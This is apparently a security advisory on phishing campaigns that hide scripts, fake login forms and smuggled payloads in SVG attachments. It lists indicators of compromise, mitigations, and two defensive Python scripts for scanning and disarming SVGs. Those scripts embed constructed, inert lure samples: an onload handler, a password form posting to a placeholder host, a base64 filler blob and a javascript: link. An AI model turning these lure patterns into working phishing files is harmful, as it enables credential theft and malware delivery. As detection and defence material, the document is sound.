Malicious SVG Attachments Bypass Email Filters in Widespread Phishing Campaigns

Threat Group: Multiple cybercriminal organizations
Threat Type: Phishing, Malware Delivery
Exploited Vulnerabilities: None (no software flaw); abuse of legitimate SVG features such as embedded JavaScript, <foreignObject> HTML content and hyperlinks, combined with email gateways that treat SVGs as harmless images
Malware Used: Agent Tesla Keylogger, XWorm Remote Access Trojan (RAT), QakBot, AsyncRAT
Threat Score: High (8.5/10) – Due to its ability to bypass traditional security measures, widespread distribution, and potential for significant data compromise.
Last Threat Observation: April 2, 2025
Overview
Scalable Vector Graphics (SVG) files, widely used for rendering two-dimensional web images, are being exploited as a novel phishing and malware delivery vector. Unlike raster formats such as JPEG or PNG, an SVG is an XML document: it can contain <script> elements, event-handler attributes (onload, onclick), hyperlinks and, through <foreignObject>, arbitrary HTML. Opened in a browser it behaves like a web page rather than a picture, while many email gateways still classify it as an image. Recent threat campaigns highlight a significant rise in malicious SVG attachments used to steal credentials and deliver malware.
SVG-based phishing schemes have seen a 245% increase from late 2024 to early 2025 according to KnowBe4 Threat Labs. The adoption of SVG attachments in campaigns indicates a shift in threat actor behavior as these files can easily bypass email filters and security gateways by posing as benign images.
Malware and Tactics
Cybercriminals are leveraging SVGs for multiple types of attacks:
- Credential Phishing: Attackers use SVGs that render counterfeit login forms inside <foreignObject> elements, mimicking Microsoft 365, DocuSign, or SharePoint portals. Embedded JavaScript captures the submitted login details and exfiltrates them to an attacker-controlled server.
- Malware Delivery: SVGs embed download links to malicious ZIP files or executables hosted on Dropbox, Bitbucket, or attacker-controlled domains, or carry the payload itself as a base64 blob inside the SVG file.
- HTML Smuggling: Script inside the SVG decodes the embedded blob and reconstructs the malware payload in the victim's browser, so email and network inspection only ever see an XML file containing text, never the executable.
- Evasion Techniques: Attackers vary each file (polymorphism) to defeat hash- and signature-based detection, pad files with benign text (e.g., Wikipedia articles), gate the phishing page behind CAPTCHAs to keep automated scanners out, and use transparent overlays to trick users into clicking.
These campaigns exploit SVG's design for interactive web elements, such as clickable regions and embedded scripts. Attacks are becoming more advanced, often including user tracking, anti-sandbox code, and multi-domain redirection chains.
Attack Vectors
- Email Attachments: SVGs are disguised as legitimate documents (e.g., invoices or voicemails). Because .svg files open in the default browser on most workstations, double-clicking the attachment executes the embedded script, which loads a phishing page or triggers a malware download.
- Embedded Links in Emails: Links to SVG files hosted on legitimate cloud platforms appear trustworthy, but the file executes its JavaScript as soon as the browser renders it.
- Click Traps: Blank or transparent SVG graphics contain active click areas leading to phishing websites or triggering downloads.
- CAPTCHA-Protected Phishing: Campaigns employ CAPTCHAs to filter automated scanners before presenting the phishing login form to real users.
Notable Campaigns
- Cofense (2023–2024): Documented SVG smuggling as a QakBot delivery technique and the use of the AutoSmuggle tool to embed ZIP payloads in SVGs delivering Agent Tesla and XWorm. These attachments bypassed detection through polymorphic variation.
- Sophos X-Ops (2025): Reported phishing emails using SVGs that emulate Microsoft login pages, backed by adversary-in-the-middle (AiTM) kits that relay the login to capture the session, and gated behind CAPTCHAs so that automated scanners never reach the login form.
- AhnLab (2024–2025): Tracked SVGs smuggling AsyncRAT using base64-encoded scripts and implementing anti-sandboxing logic to avoid analysis.
- KnowBe4 (March 2025): Recorded SVG attachments comprising 30% of all flagged malicious attachments in early March, including campaigns that targeted Office 365 credentials.
Indicators of Compromise (IoCs)
File Hashes (MD5):
- 42565c1c9ecedd937439713e20838b3a
- caad49bc4c408e6af8aea813cec6cb0b
Malicious Domains:
hxxp://oK2Nv4ZWX6.moydow[.]de
hxxps://[Account Domain].islaxw[.]es
URLs:
hxxp://oK2Nv4ZWX6.moydow[.]de/.../[Email Account]
hxxps://[Account Domain].islaxw[.]es/.../#[Email Account]
Attachment Names (Observed):
Play Voicemail Transcription.(387KB).svg
MT103_0296626389_.svg
DOC217_3052.svg
Access Document Remittance_RECEIPT762.svg
Behaviors:
- Unexpected downloads triggered by SVGs
- SVG-initiated connections to low-reputation or recently registered domains
- Use of base64 JavaScript strings in SVGs
- Redirection to phishing domains after CAPTCHA prompt
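The features listed under Malware and Tactics and the base64 behaviour listed above can be checked statically before an attachment ever reaches a browser. The following Python triage script is an added example written for this page, not code from any of the cited vendors; the sample SVGs, the example.invalid hostname and the scoring weights are constructed assumptions, and the base64 run is inert filler rather than a payload.

```python
"""Static triage of an SVG attachment (stdlib only).

Flags the capabilities that credential-phishing and HTML-smuggling SVGs rely on:
<script>, <foreignObject> with HTML forms, on* event handlers, javascript:/data:
URIs, references to external hosts and large base64 blobs. Sample inputs below are
constructed for this example; the base64 run is inert filler, not a payload.
"""
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Elements that give an SVG scripting, HTML or network capability.
ACTIVE_TAGS = {"script", "foreignobject", "iframe", "embed", "object", "form", "input", "meta"}
HREF_ATTRS = {"href", "src", "action"}                  # attributes that may carry a URL
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")  # long unbroken base64-looking run
WEIGHTS = {  # finding prefix -> score contribution (assumed weights); anything else scores 1
    "element:script": 3, "event-handler": 3, "javascript-uri": 3, "vbscript-uri": 3,
    "element:foreignobject": 2, "element:form": 2, "element:iframe": 2, "element:meta": 2,
    "base64-blob": 2, "data-uri": 2,
}


def _local(qname: str) -> str:
    """'{http://www.w3.org/2000/svg}foreignObject' -> 'foreignobject'."""
    return qname.rsplit("}", 1)[-1].lower()


def triage_svg(data: bytes) -> dict:
    findings, hosts = [], set()
    try:
        # NOTE: a production scanner should parse with defusedxml so entity-expansion
        # tricks cannot stall it; ElementTree is used here to stay stdlib-only.
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        # Fail closed: a file that is not well-formed XML is not a usable image either.
        return {"verdict": "suspicious", "score": 1,
                "findings": [f"xml-parse-error: {exc}"], "hosts": []}
    for el in root.iter():
        name = _local(el.tag)
        if name in ACTIVE_TAGS:
            findings.append(f"element:{name}")
        if el.text and BASE64_RUN.search(el.text):
            findings.append(f"base64-blob:text:{name}")
        for attr, value in el.attrib.items():
            aname = _local(attr)
            if aname.startswith("on"):                    # onload, onclick, onbegin ...
                findings.append(f"event-handler:{aname}")
            if aname in HREF_ATTRS:
                parsed = urlparse(value.strip())          # urlparse lower-cases the scheme
                if parsed.scheme in ("javascript", "vbscript", "data"):
                    findings.append(f"{parsed.scheme}-uri:{aname}")
                elif parsed.scheme in ("http", "https") and parsed.hostname:
                    hosts.add(parsed.hostname)
                    findings.append(f"external-host:{parsed.hostname}")
            if BASE64_RUN.search(value):
                findings.append(f"base64-blob:attribute:{aname}")
    score = sum(next((w for k, w in WEIGHTS.items() if f.startswith(k)), 1) for f in findings)
    verdict = "malicious" if score >= 3 else "suspicious" if score else "clean"
    return {"verdict": verdict, "score": score, "findings": findings, "hosts": sorted(hosts)}


# Constructed samples (not real attachments).
BENIGN = (b'<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">'
          b'<circle cx="50" cy="50" r="40" fill="navy"/><text x="10" y="20">Logo</text></svg>')

_BLOB = "QUJD" * 60  # 240 base64 characters of inert filler standing in for a smuggled blob
LURE = f'''<svg xmlns="http://www.w3.org/2000/svg" width="600" height="400" onload="init()">
  <text x="20" y="40">Play Voicemail Transcription</text>
  <foreignObject x="0" y="60" width="600" height="300">
    <form xmlns="http://www.w3.org/1999/xhtml" action="https://mail-verify.example.invalid/submit">
      <input type="password" name="pw"/>
    </form>
  </foreignObject>
  <script><![CDATA[
    var payload = "{_BLOB}";   // placeholder; a real lure would decode this and trigger a download
    function init() {{}}
  ]]></script>
</svg>'''.encode()

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("lure", LURE)):
        result = triage_svg(sample)
        print(label, result["verdict"], result["score"], result["findings"])
```

Run it over quarantined .svg attachments (including files extracted from archives) and feed the verdict and the external hosts into the mail gateway or SIEM. A lone external host only rates suspicious, since legitimate SVGs occasionally link out, but any <script> or event handler in an emailed image is reason enough to block.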
Mitigation and Recommendations
- Email Filtering: Block or quarantine emails with SVG attachments unless explicitly required. Match on content (an XML document whose root element is <svg>), not only on the .svg extension, and apply the same rule to SVGs inside archives. Use advanced attachment filtering and sandboxing to analyze content.
- Content Disarm and Reconstruction (CDR): Sanitize SVG attachments by rasterizing them to a static image format (e.g., PNG), which removes scripts, <foreignObject> HTML, event handlers and external references in one step. Prefer rasterizing over script-stripping where possible: SVG has several paths to active content (animated href values, CSS url() references) that naive sanitizers miss.
- User Awareness: Train staff on the risks of SVG attachments and phishing red flags, particularly around file types like .svg, .html, and .htm.
- File Association Policies: Reconfigure workstations to open .svg files with Notepad or an offline image viewer so that double-clicking an attachment does not launch a browser. This is a speed bump rather than a control: a user can still open the file from within a browser, and links to SVGs hosted on the web are unaffected.
- EDR/AV Enhancements: Tune security tools to detect suspicious process activity launched from browser sessions initiated by SVG files, for example a browser spawned by the mail client with an .svg path on its command line.
- Web Filtering: Block access to known phishing and malware domains. Use DNS-based threat intelligence to catch newly registered or dynamic redirector domains.
- Threat Hunting: Monitor for known IoCs, anomalous SVG file downloads, and sudden browser activity tied to mail attachments.
- MFA Enforcement: Mandate multi-factor authentication for all cloud and remote access systems. Because the Sophos-reported campaigns use AiTM kits that relay the login and capture the resulting session, prefer phishing-resistant methods (FIDO2 security keys or passkeys) over one-time codes and push approvals, which an AiTM proxy defeats.
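For environments that must accept SVG but cannot rasterize it (for instance, a logo that has to stay scalable), the CDR step can instead strip the active content named in the mitigation list above. The Python function below is an added example for this page, not a vendor's CDR implementation; the click-trap sample SVG and its example.invalid hostname are constructed.

```python
"""Disarm an SVG while keeping the drawing (stdlib only).

Removes everything that can run code, embed HTML, change a link at render time or
reach the network: <script>, <foreignObject>, <animate>/<set> (which can rewrite an
href to javascript: after load), <style> (CSS @import/url()), on* event handlers,
any href/src/action that is not a same-document "#id" reference, and style
attributes containing url(). The sample below is constructed for this example.
"""
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
DROP_TAGS = {"script", "foreignobject", "animate", "set", "style"}
URL_ATTRS = {"href", "src", "action"}

ET.register_namespace("", SVG_NS)        # serialise with the usual default and xlink prefixes
ET.register_namespace("xlink", XLINK_NS)


def _local(qname: str) -> str:
    """'{http://www.w3.org/2000/svg}foreignObject' -> 'foreignobject'."""
    return qname.rsplit("}", 1)[-1].lower()


def _is_local_ref(value: str) -> bool:
    """Only same-document references (e.g. href="#logo") are kept."""
    return value.strip().startswith("#")


def disarm_svg(data: bytes) -> bytes:
    root = ET.fromstring(data)            # use defusedxml in production
    if _local(root.tag) != "svg":
        raise ValueError("root element is not <svg>")
    # ElementTree has no parent pointers; build the map once so we can detach elements.
    parents = {child: parent for parent in root.iter() for child in parent}
    for el in list(root.iter()):          # snapshot: the tree is mutated while walking
        if _local(el.tag) in DROP_TAGS:
            parents[el].remove(el)        # root is <svg>, so every dropped element has a parent
            continue
        for attr in list(el.attrib):
            aname, value = _local(attr), el.attrib[attr]
            if (aname.startswith("on")
                    or (aname in URL_ATTRS and not _is_local_ref(value))
                    or (aname == "style" and "url(" in value.lower())):
                del el.attrib[attr]
    return ET.tostring(root, encoding="utf-8", xml_declaration=True)


# Constructed click-trap sample: transparent full-size link, event handler, animated
# href, remote stylesheet and tracking pixel over a harmless drawing.
CLICK_TRAP = b'''<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="400" height="200">
  <symbol id="logo"><circle cx="5" cy="5" r="5"/></symbol>
  <text x="20" y="100">DOC217_3052 - click to view</text>
  <a xlink:href="https://docs-view.example.invalid/open">
    <rect width="400" height="200" fill-opacity="0"/>
  </a>
  <rect x="0" y="0" width="400" height="200" fill="white" onclick="go()">
    <animate attributeName="href" values="javascript:go()" dur="1s"/>
  </rect>
  <style>@import url("https://docs-view.example.invalid/t.css");</style>
  <use xlink:href="#logo" x="10" y="10"/>
  <image xlink:href="https://docs-view.example.invalid/pixel.png" width="1" height="1"/>
</svg>'''

if __name__ == "__main__":
    print(disarm_svg(CLICK_TRAP).decode())
```

The output keeps the <symbol>, <text>, <use> and the (now inert) <a> and <rect> elements, and drops every script, handler, animation, stylesheet and external URL; verify the result with a triage pass before release rather than trusting the stripper alone.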
Risk Summary
SVG-based attacks mark a return to file format abuse as attackers innovate around static defenses. These campaigns are growing in sophistication—leveraging multi-stage redirection, evasive phishing kits, and script-embedded payload delivery. Their success is tied to low user awareness and the general underestimation of SVG files as threat vectors. Organizations must adapt to treat SVGs as potentially dangerous content and build layered detection and response strategies accordingly.
Conclusion
The exploitation of SVG files for phishing and malware delivery is a stark reminder that threat actors continue to evolve by turning common web technologies into attack vectors. These attacks combine stealth, interactivity, and technical creativity, posing a serious challenge to email and endpoint security controls. The increasing adoption of SVG-based delivery methods across multiple malware families and phishing campaigns suggests this tactic is no longer niche—it is now mainstream within the cybercriminal arsenal.
Security teams must not underestimate the risk posed by seemingly harmless image files. Organizations should respond by incorporating SVG filtering into existing defenses, enhancing user education, and closely monitoring for suspicious activity triggered by unconventional file types. Threat intelligence sharing, updated detection rules, and proactive hunting are essential for staying ahead of this growing threat. As SVG-based attacks continue to evolve, defenders must remain vigilant and agile in their detection and response strategies.
Sources
- ASEC - SVG Phishing Malware Being Distributed with Analysis Obstruction Feature
- Cofense: SVG Smuggling: QakBot Campaign Uses New Delivery Technique
- Sophos X-Ops: Scalable Vector Graphics files pose a novel phishing threat
- KnowBe4: 245% Increase in SVG Files Used to Obfuscate Phishing Payloads
- BleepingComputer: Phishing Emails Increasingly Use SVG Attachments to Evade Detection